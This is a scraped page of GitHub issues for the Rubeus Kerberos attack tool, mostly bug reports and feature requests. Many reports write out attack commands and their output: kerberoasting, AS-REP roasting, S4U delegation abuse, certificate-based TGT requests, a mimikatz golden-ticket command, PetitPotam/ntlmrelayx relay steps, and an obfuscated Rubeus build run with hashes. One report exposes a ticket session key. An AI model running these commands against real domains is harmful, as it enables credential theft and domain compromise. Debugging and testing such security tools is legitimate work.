ghostpack / rubeus Goto Github PK

So, couple ideas here, by passing parameters on cmdline, you expose sensitive material to Command Line Loggers.

By being a library/dll assembly, you can import and load into other tools and remove any cmdline leaking.

Just an idea ;-) . Great work!

C:/Windows/Temp/Rubeus.exe asktgs /ticket:REDACTED /service:CIFS/test-dc1.test.local

I get the above error when using asktgs. Bi-directional trust between two forests and ticket is generated with rc4 trust key from recent hashdump. Any ideas on issue?

This line (193) in ASRepRoast function doesn't check to see if InnerException is null before accessing it and in some cases it is indeed null (like if you run asreproast on a non domain machine and forget to specify the domain) :

Console.WriteLine("\r\n[X] Error executing the domain searcher: {0}", ex.InnerException.Message);

I'll submit a PR to fix this, but will be my first time doing that so apologies if I do something stupid.

The documentation says it compiles in VS2015CE, and includes a link, however it doesn't seem to. Issue #41 shows a user having an issue, the same one I appear to be having.

I have a nearly-fresh Windows install, a completely fresh installation of Visual Studio 2015 Community Edition, and a fresh downloaded ZIP from the repository and I see errors when I try to build for release:

It starts with:

Severity	Code	Description	Project	File	Line	Suppression State
 Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active 

Then if I follow one, it expands to:

Severity	Code	Description	Project	File	Line	Suppression State
Error	CS0103	The name 'var' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'var' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	701	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	703	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	703	Active
Error	CS0103	The name 'luidPtr' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	705	Active
Error	CS0103	The name 'count' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS0103	The name 'count' does not exist in the current context	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	699	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active
Error	CS1003	Syntax error, ',' expected	Rubeus	C:\Users\BOCPTLID\Desktop\Rubeus-master\Rubeus\lib\LSA.cs	692	Active

I haven't downloaded VS2019 yet to see if it does actually work there, but I did spend some time troubleshooting and it seemed like an endless rabbit hole so I stopped.

From what I can see either:

1. The documentation may need be updated to say to use VS2019
2. There may be bugs that need to be fixed.

I don't have enough Csharp experience to know which!

Thanks!

get error of 'KDC has no support for PADATA type (pre-authentication data)' when I asktgt from a certificate

Rubeus.exe asktgt /user:dc$ /certificate:C:\host1.pfx /createnetonly:C:\Windows\System32\cmd.exe /show /domain:domain.local /dc:10.0.0.1

(_____ \ | |
) ) | | _____ _ _ ___
| __ /| | | | _ | ___ | | | |/)
| | \ | || | |) ) | || | |
|| ||/|/|_____)_/(/

v1.6.4

[*] Action: Ask TGT

[*] Showing process : True
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4128
[+] LUID : 0x822bf2

[] Using PKINIT with etype rc4_hmac and subject: CN=dc.domain.local
[] Building AS-REQ (w/ PKINIT preauth) for: 'domain.local\dc$'
[*] Target LUID : 8530930

[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

Provide the ability to specify an /ldapfilter:"(property=X)" option for granular user targeting in the kerberoast and asreproast functions.

When using alternate credentials, the /creduser must be specified with: /creduser:DOMAIN.FQDN\USER

However, this does not work and Rubeus can not connect to the DC:

.\Rubeus.exe kerberoast /creduser:example.com\demo /credpassword:Password123 /dc:192.168.0.38 /domain:example.com

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : example.com

[X] Error creating the domain searcher: The LDAP-Server is not available.

But when I am using the IP of the DC, everything works as expected:

.\Rubeus.exe kerberoast /creduser:192.168.0.38\demo /credpassword:Password123 /dc:192.168.0.38 /domain:example.com

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : example.com
[*] Using alternate creds  : 192.168.0.38\demo
[*] Searching path 'LDAP://192.168.0.38' for Kerberoastable users

[X] No users found to Kerberoast!

Just noticed the hash outputted by asreproast does not contain the eType, not sure if this is intended or not.

 .\Rubeus.exe asreproast

[*] Action: AS-REP roasting
...
[*] AS-REP hash:

      $krb5asrep$ASRep_AES128@....

At least for hashcat the eType must be specified, e.g.: $krb5asrep$eType$userName...

Based on a quick example run in my lab it seems eType 23 (ARCFOUR) is requested by Rubeus and contained in all AS-Rep responses (even for AES-128/256 enabled users), as shown below:

All retrieved ASRep responses for RC4, AES128 and AES256 users could be cracked with hashcat using eType 23 using hashcat -m 18200.

If not intended otherwise the eType 23 could be added in returned hases (as it is done with kerberoast hashes).

hello, in my test environment to test something, I find the version of 1.6.4 have some wrong OR BUG?
like this my command such as to ptt exec:
Rubeus.exe asktgt /user:OWA2013$ /ptt /certificate:XXX

the result have some wrong like this
v1.6.4

[*] Action: Ask TGT

[] Using PKINIT with etype rc4_hmac and subject: CN=OWA2013$
[] Building AS-REQ (w/ PKINIT preauth) for: 'rootkit.org\OWA2013$'

[X] KRB-ERROR (75) : 75

but my cert ticket is right I don't know why the program have not to ptt success
I need your help, thank you very much!

Exploring abuse paths, I was unable to successfully pull off an RBCD attack, due to a System.Overflow exception when using the s4u Rubeus command. Failing that, I went down a different path of deploying alternate credentials on another target (via Whisker.exe), and then using Rubeus to request a TGT using the asktgt command with the /certificate flag. This also resulted in an overflow exception. Using asktgt for other, less-valuable, randomly selected targets worked fine.

The original RBCD command:
.\Dumpeus.exe s"4"u /user:AB0123CDEF /rc4:FCF7748F9820FE4B1C70F3D8A763ADDA /impersonateuser:'$UserStartsWithDollar' /msdsspn:WSMAN/up0013abcd.client.net /domain:client.net /dc:up123abc.client.net /luid: 0x9afcde8 /ptt

The error, after successful TGT request, S4U32elf, and TGS acquisition [snipped from output preceding error]...

[*] Building S4U2proxy request for service: 'WSMAN/up0013abcd.client.net'
[*] Sending S4U2proxy request
[*] No more data available. Assuming Domain Controller [REDACTED] is finished sending data: An existing connection was forcibly closed by the remote host

[!] Unhandled Rubeus exception:

System.OverflowException: Array dimensions exceeded supported range.
   at proceed.henderson.doll(String server, Int32 port, Byte[] data, Boolean noHeader)
   at film.logging.bedroom(unique kirbi, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, Boolean opsec)
   at film.logging.commodity(unique kirbi, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, String targetDomainController, String targetDomain, Boolean s, Boolean opsec, Boolean bronzebit, String keyString, KERB_ETYPE encType, String requestDomain, String impersonateDomain)
   at film.logging.tribunal(String userName, String domain, String keyString, KERB_ETYPE etype, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, String targetDomainController, String targetDomain, Boolean self, Boolean opsec, Boolean bronzebit)
   at rating.lpYCQJ6k3Gkd.Execute(Dictionary`2 arguments)
   at yQkttURY2tqu.confirm.restructuring(String commandName, Dictionary`2 arguments)
   at granted.trails.MainExecute(String commandName, Dictionary`2 parsedArgs)

Switching to a shadow credential attack, and then asking for a TGT, I received a similar error:
Dumpeus2.exe "a"s"k"t"g"t /user:$DifferentUserWithDollarSign /certificate:c:\temp\id.txt /password:P@55word1234567890 /domain:client.net /dc:up123abc.client.net /getcredentials /show

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=$DifferentUserWithDollarSign
[*] Building AS-REQ (w/ PKINIT preauth) for: 'client.net\$DifferentUserWithDollarSign'

[!] Unhandled Rubeus exception:

System.Exception: Error parsing response AS-REQ: digit.college: value overflow
   at bloom.community.brooklyn(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at bloom.community.distant(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at bone.ladder.award(cardiac asReq, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verbose, Boolean opsec).  Base64 response: a4IS**[BASE64 TICKET SNIPPED/REDACTED]**5sM=
   at bone.ladder.award(cardiac asReq, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verbose, Boolean opsec)
   at bone.ladder.heads(String userName, String domain, String certFile, String certPass, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verifyCerts)
   at nut.soap.Execute(Dictionary`2 arguments)
   at lit.FzaoJ2VoQiXp.centre(String commandName, Dictionary`2 arguments)
   at ef.WHJR6iiyUIHh.MainExecute(String commandName, Dictionary`2 parsedArgs)

Given the above error showed the base64 value of the ticket obtained therein, I attempted to describe it, with the following error:
Dumpeus2.exe describe /ticket:a4IS**[BASE64 TICKET SNIPPED/REDACTED]**5sM=

[*] Action: Describe Ticket


[!] Unhandled Rubeus exception:

digit.college: value overflow
   at bloom.community.brooklyn(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at bloom.community.distant(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at worlds.professor..ctor(Byte[] bytes)
   at photographers.climb.Execute(Dictionary`2 arguments)
   at lit.FzaoJ2VoQiXp.centre(String commandName, Dictionary`2 arguments)
   at ef.WHJR6iiyUIHh.MainExecute(String commandName, Dictionary`2 parsedArgs)

I don't think the issue is the obfuscation of Rubeus, because other tickets can be acquired/shown/passed/described without error. I also understand it may be difficult to troubleshoot this without the contents of the base64-encoded ticket, so I can decode and submit components of the tickets as warranted/requested to help resolve this [potential] issue.

This seems to be in the same ballpark as these issues:

• #90 (comment)
• #47 (comment)

I am using the latest version. I also compiled the version from the June 7, 2021 commit (I believe the first commit with the /certificate capability), and I get the same errors.

Thanks!

In lines 464 and 465 of ForgeTicket.cs:

Seems like these values don't end up in the userObject dictionary if the user has never logged on, which causes:

System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.
at System.ThrowHelper.ThrowKeyNotFoundException()
at System.Collections.Generic.Dictionary2.get_Item(TKey key) at Rubeus.ForgeTickets.ForgeTicket(String user, String sname, Byte[] serviceKey, KERB_ETYPE etype, Byte[] krbKey, KERB_CHECKSUM_ALGORITHM krbeType, Boolean ldap, String ldapuser, String ldappassword, String sid, String domain, String netbiosName, String domainController, TicketFlags flags, Nullable1 startTime, Nullable1 rangeEnd, String rangeInterval, Nullable1 authTime, String endTime, String renewTill, Nullable1 id, String groups, String sids, String displayName, Nullable1 logonCount, Nullable1 badPwdCount, Nullable1 lastLogon, Nullable1 logoffTime, Nullable1 pwdLastSet, Nullable1 maxPassAge, Nullable1 minPassAge, Nullable1 pGid, String homeDir, String homeDrive, String profilePath, String scriptPath, String resourceGroupSid, List1 resourceGroups, PacUserAccountControl uac, String outfile, Boolean ptt, Boolean printcmd, String cName, String cRealm, String s4uProxyTarget, String s4uTransitedServices, Boolean includeAuthData)
at Rubeus.Commands.Silver.Execute(Dictionary2 arguments) at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

Doing:

> rubeus.exe kerberoast /format:hashcat /aes

... produces AES256 hashes in the format:

$krb5tgs$18$*[username]$[domain]$[spn]*$[checksum]$[edata]

Feeding this to hashcat (v5.1.0) results in an error:

~> hashcat -m 19700 -o cracked.txt -a 0 krb5tgs.txt password.txt

Hashfile 'krb5tgs.txt' on line 1 ($krb5t...3bc0e660c3164355a02806c3d248afc0): Separator unmatched
No hashes loaded.

Looking at the corresponding hashcat module, the expected format is:

$krb5tgs$18$[username]$[domain]$*[spn]*$[checksum]$[edata]

Manually updating the hash from Rubeus results in another error

~> hashcat -m 19700 -o cracked.txt -a 0 krb5tgs2.txt password.txt

Hashfile 'krb5tgs2.txt' on line 1 ($krb5t...3bc0e660c3164355a02806c3d248afc0): Token length exception
No hashes loaded.

Apparently hashcat expects the checksum to be exactly 24 chars wide.

Manually moving the $ separator 8 chars up makes hashcat load the hash, but doesn't succeed in cracking it. I suspect we need to re-calculate the checksum over the cipherText part, but I'm a bit out of my depth here 😄

Hi, I wonder if it would make sense to add support for KDC Proxy (MS-KKDCP) to Rubeus. AFAIK, Remote Desktop Gateways and DirectAccess VPN servers are exposing Kerberos over HTTPS. This could theoretically open new and interesting scenarios like account enumeration and kerberoasting over the Internet. It should also be possible to deploy a standalone KDC Proxy Service for testing (thx @SteveSyfuhs).

Please add the support for alternate credentials when performing /rc4opsec mode on kerberoast.

This is not supported atm and Rubeus tries to get a TGT for the current user instead:

.\Rubeus.exe kerberoast /rc4opsec /format:hashcat /creduser:example.com\demo /credpassword:Password123 /dc:192.168.0.38 /domain:example.com


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user

  [X] Error 1355 retrieving domain controller : Die angegebene Domäne ist nicht vorhanden, oder es konnte keine Verbindung hergestellt werden
[X] Error retrieving current domain controller

[!] Unhandled Rubeus exception:

System.NullReferenceException: Der Objektverweis wurde nicht auf eine Objektinstanz festgelegt.
   bei Asn1.AsnElt.Decode(Byte[] buf, Boolean exactLength)
   bei Rubeus.KRB_CRED..ctor(Byte[] bytes)
   bei Rubeus.Roast.Kerberoast(String spn, String userName, String OUName, String domain, String dc, NetworkCredential cred, String outFile, KRB_CRED TGT, Boolean useTGTdeleg, String supportedEType, String pwdSetAfter, String pwdSetBefore, Int32 resultLimit)
   bei Rubeus.Commands.Kerberoast.Execute(Dictionary`2 arguments)
   bei Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   bei Rubeus.Program.Main(String[] args)

First of all, great tool! I have noticed i could use a function to create output files for hashes for stuff like roasting (hashcat format would be best) and perhaps methods to multi ASREProast by loading a userlist or even bruteforcing usernames and automatically checking each user for the no preauth.

Only extract tickets for the current user, even if elevated.

Steps to reproduce:

In mimikatz, run the following:

kerberos::golden /domain:blah.local /sid:S-1-5-21-1234123412-1234123412 /rc4:11112222333344445555666677778888 /target:blahblah.local /service:asdf/asdf /user:Administrator /ptt

Then, when you run Rubeus.exe dump you'll see the following error:

[X] Error 1312 calling LsaCallAuthenticationPackage() for target "asdf/asdf/blahblah.local" : A specified logon session does not exist. It may already have been terminated

Klist.exe and mimikatz successfully list the tickets, however.

While trying to create a silver ticket with the /ldap arg:

In ForgeTicket.cs at line 399, if the user has never reset their password the userObject["pwdlastset"] result ends up with Rubeus trying to make a _FILETIME out of a DateTime for 01/01/0001 12:00:00 AM, resulting in the following stack trace:

System.ArgumentOutOfRangeException: Not a valid Win32 FileTime.
at System.DateTime.InternalToFileTime(Int64 ticks)
at System.DateTime.ToFileTimeUtc()
at Rubeus.Ndr._FILETIME..ctor(DateTime dateTime)
at Rubeus.ForgeTickets.ForgeTicket(String user, String sname, Byte[] serviceKey, KERB_ETYPE etype, Byte[] krbKey, KERB_CHECKSUM_ALGORITHM krbeType, Boolean ldap, String ldapuser, String ldappassword, String sid, String domain, String netbiosName, String domainController, TicketFlags flags, Nullable1 startTime, Nullable1 rangeEnd, String rangeInterval, Nullable1 authTime, String endTime, String renewTill, Nullable1 id, String groups, String sids, String displayName, Nullable1 logonCount, Nullable1 badPwdCount, Nullable1 lastLogon, Nullable1 logoffTime, Nullable1 pwdLastSet, Nullable1 maxPassAge, Nullable1 minPassAge, Nullable1 pGid, String homeDir, String homeDrive, String profilePath, String scriptPath, String resourceGroupSid, List1 resourceGroups, PacUserAccountControl uac, String outfile, Boolean ptt, Boolean printcmd, String cName, String cRealm, String s4uProxyTarget, String s4uTransitedServices, Boolean includeAuthData) at Rubeus.Commands.Silver.Execute(Dictionary2 arguments)
at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments) at Rubeus.Program.MainExecute(String commandName, Dictionary2 parsedArgs)

In asktgt the output file is sanitized when a full path for ticket output is used (e.g., "C:\Folder 1\Folder2\ticket.kirbi"). The result is saved into the folder with rubeus.exe instead of provided output. What is the purpose of sanitization?

Ref:

New PKInit features fail when FIPS compliance is enforced. SHA1Managed is not FIPS compliant. Suggested code changes are available #66 . It is a simple change to FIPS compliant classes as the classes have the same Methods. Opening issue to call attention to the PR.

Just pulled the latest and tried a run of the mill asktgt, attempted with RC4 and AES128 hashes.

PS C:\Dev\Rubeus-master\Rubeus\bin\Release> .\Rubeus.exe asktgt /user:<redacted> /aes128:<redacted> /domain:<redacted> /dc:<redacted>

[*] Action: Ask TGT

[*] Using aes128_cts_hmac_sha1 hash: <redacted>
[*] Building AS-REQ (w/ preauth) for: '<redacted>\<redacted>'

[!] Unhandled Rubeus exception:

Asn1.AsnException: value overflow
   at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at Rubeus.Ask.InnerTGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean verbose)
   at Rubeus.Ask.TGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe)
   at Rubeus.Commands.Asktgt.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

Forgive me if I'm missing something, but it doesn't look like its currently possible to create golden/silver tickets in Rubeus and I was just curious if this is something we can add or if it was intentionally not included?

I know we can use /asktgt and /asktgs to request legitimate tickets from a DC, and we can use /ptt to cache those. But what about the silver ticket attack style that you can do in mimikatz and Impacket's ticketer.py, where you don't get the service ticket from a DC but instead create a fake one using the service account's password to encrypt it (and then /ptt to cache that).

It seems like a lot of the ground work required for that has already been done in Rubeus, so I'm wondering if it was an intentional choice to leave it out or if its just a case of no one having chance to implement it yet? If it's the latter, I might have a go at it.

As a user of Rubeus, I would like to be able to output tickets into folders defined by full path.

Ref: #63

The workaround given in

Is anyone else getting errors when attempting to build the Release for Rubeus? I'm able to load the project, but when I try to build the Release configuration, I get the below errors.

All are inside LSA.CS and have to do with line 692:

var ret = Interop.LsaEnumerateLogonSessions(out var count, out var luidPtr);

I'm getting a (Syntax Error, "," expected) and a bunch of errors about how "the name var does not exist in the current context." Same goes for "count" and "luidPtr".

I've confirmed I have the .NET Framework 3.5 installed and have built other projects in the repository okay, such as SharpUp.

Let me know if additional information is required.

Situation: target user has an SPN set that has a form like "HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local" (ex: https://docs.microsoft.com/en-us/windows/win32/ad/name-formats-for-unique-spns#replicable-services) and msDS-SupportedEncryptionTypes is not set. Rubeus kerberoasts as expected when run without any arguments but throws the following exception when run with rc4opsec:

[X] Error: invalid TGS_REQ sname 'HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local'
[X] KRB-ERROR (60) : KRB_ERR_GENERIC
[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN

Removing the the "/CN=Users,DC=domain,DC=local" portion resolves the issue.

Full output:
w/o rc4opsec

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 1


[*] SamAccountName         : user
[*] DistinguishedName      : CN=user,CN=Users,DC=domain,DC=local
[*] ServicePrincipalName   : HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local
[*] PwdLastSet             : 3/10/2020 3:11:27 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*<snip>

w/ rc4opsec

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Total kerberoastable users : 1


[*] SamAccountName         : user
[*] DistinguishedName      : CN=user,CN=Users,DC=domain,DC=local
[*] ServicePrincipalName   : HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local
[*] PwdLastSet             : 3/10/2020 3:11:27 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[X] Error: invalid TGS_REQ sname 'HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local'

[X] KRB-ERROR (60) : KRB_ERR_GENERIC


[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN


[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN

I've also experienced this issue in other environments, however the error was the same as #42 rather than the above.

when i execute the command: Rubeus.exe ptt /ticket:base64

the rubeus and system time have different timestamp ?

There's a few places where the code checks to see if it is running as Local System by doing this:

var currentName = WindowsIdentity.GetCurrent().Name;
if (currentName == "NT AUTHORITY\\SYSTEM")

Which I'm pretty sure won't work on non English versions of Windows (because in French for example the account name would be "AUTORITE NT/Systeme").
Plus it just generally seems like a better idea to compare our SID to the well known Local System SID, rather than comparing account name strings. So I propose changing to this instead:

var currentSid = WindowsIdentity.GetCurrent().User;
if (currentSid.IsWellKnown(WellKnownSidType.LocalSystemSid))

I'm trying to reproduce the AD CS replay issue here: https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/

Environment (All Windows machine are joined in domain)

1. Windows 2016 DC (10.10.10.9)
2. Windows 2016 AD CS (10.10.10.4)
3. Ubuntu 20.04 as attach machine (10.10.10.6)
4. Windows 2016 (10.10.10.5)

Steps

1. Run ntlmrelayx.py -debug -smb2support --target http://10.10.10.4/certsrv/certfnsh.asp --adcs --template KerberosAuthentication on Ubuntu machine
2. Run PetitPotam.py -u lowpriv -p XXXX 10.10.10.6 10.10.10.9 on Ubuntu machine
3. Run Rubeus.exe asktgt /user:DC$ /certificate:XXX /ptt on 10.10.10.5

ntlmreplay successfully generated the certificate but when I do the ptt step with Rubeus:

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject:
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.com\DC$'

[X] KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED

I'm using the latest release (last commit 4 days ago).

Visual studio 2013 compiled failed

If I run an asktgt using certificates (i.e., smartcard): asktgt /user: /domain: /dc: /certificate: /password: /ptt, where the <> fields in the previous example have been sanitized, the following error happens in Rubeus 2.0 (and a few versions previously):

[*] Action: Ask TGT
[!] Unhandled Rubeus exception:

System.Security.Cryptography.CryptographicException: Cannot find the requested object.
at System.Security.Cryptography.CryptographicException.ThrowCryptographicException(Int32 hr)
at System.Security.Cryptography.X509Certificates.X509Utils._QueryCertBlobType(Byte[] rawData)
at System.Security.Cryptography.X509Certificates.X509Certificate.LoadCertificateFromBlob(Byte[] rawData, Object password, X509KeyStorageFlags keyStorageFlags)
at System.Security.Cryptography.X509Certificates.X509Certificate2..ctor(Byte[] rawData, String password)
at Rubeus.Ask.TGT(String userName, String domain, String certFile, String certPass, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean verifyCerts, String servicekey, Boolean getCredentials)
at Rubeus.Commands.Asktgt.Execute(Dictionary2 arguments) at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

If the same exact command is run with v1.5.0 it works as expected (when the certificate support was added). I started noticing this around v1.7.0 and hoped it would be noticed/reported, but since it hasn't, here we are.

While running brute force password against kerberos using a password against set list of users,
in scenario where the password matches for a user, but is expired, the Rubeus abruptly stops brute forcing against rest of the users and throws the result with error for the expired password: Kerberos Error 23: KDC_ERR_KEY_EXPIRED

Unable to find any variable that I can set to prevent this from happening.

asktgt supports hash only, aka </rc4:HASH | /aes256:HASH>

Can you add support of plaintext password?

Trying to as-rep roast from a non domain machine without specifying the DC name (with DNS server set to point to DC) like so:

Rubeus.exe asreproast /creduser:htb.local\j.smith /credpassword:passw0rd /domain:htb.local

Fails like this:

[X] Error 1355 retrieving domain controller : The specified domain either does not exist or could not be contacted
[*] Using domain controller:  (fe80::d561:f8ed:7de4:ce8a%25)
[*] Building AS-REQ (w/o preauth) for: 'htb.local\test'
[X] Error connecting to fe80::d561:f8ed:7de4:ce8a%25:88 : No connection could be made because the target machine activel
y refused it fe80::d561:f8ed:7de4:ce8a%25:88

because the GetDCIP function runs the code below and seems to expect that a DC has been specified. So when the DC name string is null, it just gets the IP addresses for the local machine (in my case I guess first one it found was an IPv6 one)

System.Net.IPAddress[] dcIPs = System.Net.Dns.GetHostAddresses(DCName);

Working on a PR at the moment that fixes this and also fixes #33

Is x32 systems supported?
running
dump
on Windows 7 x32 gives
[X] Error 87 calling LsaCallAuthenticationPackage for target ... : The parameter is incorrect.
both compiling AnyCpu and x86.
Seems like KERB_RETRIEVE_TKT_REQUEST structure size error.

I'm reading this article and trying to reproduce the "windows object permission backdoor".

Environment:

1. Windows 2016 DC (10.10.10.20) as domain controller of testnet.com
2. Windows 2016 SRV1 (10.10.10.22) as victim, domain joined
3. Windows 2016 SRV2 (10.10.10.23) as attack machine, domain joined

Accounts:

1. TESTNET\admin in DA group
2. TESTNET\lowpriv as local administrator of SRV2

Steps:

1. In ADSI manually add Full Control permission of SRV1$ to [email protected]
2. Log in with TESTNET\lowpriv to SRV2 and launch the modified version of https://gist.github.com/HarmJ0y/a1ae1cf09e5ac89ee15fb3da25dcb10a
3. Verify msDS-AllowedToDelegateTo is successfully modified for [email protected]
4. Run Rubeus.exe s4u /user:lowpriv /rc4:XXX /impersonateuser:admin /msdsspn:CIFS/SRV1.testnet.com /ptt

Problems:

1. setspn -Q */* | find /i "CIFS" shows CIFS/SRV1.testnet.com is not present, so I registered one with

   setspn -A CIFS/SRV1 SRV1$
   setspn -A CIFS/SRV1.testnet.com SRV1$
   

2. S4U failed

   [*] Action: S4U
   
   [*] Using domain controller: DC-01.testnet.com (10.10.10.20)
   [*] Building S4U2self request for: '[email protected]'
   [*] Sending S4U2self request
   
   [X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
   
   [X] S4U2Self failed, unable to perform S4U2Proxy.
   

Can you help?

Hello guys,

I am using the monitor action in order to grab TGTs after a successful "attack" against the "Print Spooler" service that is running on a domain host (in our case LABS-DC01$).

UserName                 : LABS-DC01$
Domain                   : LABS
LogonId                  : 4773477
UserSID                  : S-1-5-21-1871540109-507438259-1164035318-1001
AuthenticationPackage    : Kerberos
LogonType                : Network
LogonTime                : 2/1/2019 10:14:21 AM
LogonServer              :
LogonServerDNSDomain     : LABS.COM
UserPrincipalName        :

ServiceName              : krbtgt/LABS.COM
TargetName               :
ClientName               : LABS-DC01$
DomainName               : LABS.COM
TargetDomainName         : LABS.COM
AltTargetDomainName      : LABS.COM
SessionKeyType           : aes256_cts_hmac_sha1
Base64SessionKey         : EFzxu0gMFHnvXEA81575frbhPdKySWK/Y871RmTAaf4=
KeyExpirationTime        : 1/1/1601 2:00:00 AM
TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime                : 2/1/2019 10:25:38 AM
EndTime                  : 2/1/2019 8:25:37 PM
RenewUntil               : 2/8/2019 10:25:37 AM
TimeSkew                 : 0
EncodedTicketSize        : 1298
Base64EncodedTicket      :

  doIFDjCCBQqgAwIBBaEDAgEWooIEHTCCBBlhggQVMIIEEaADAgEFoQobCExBQlMuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhM
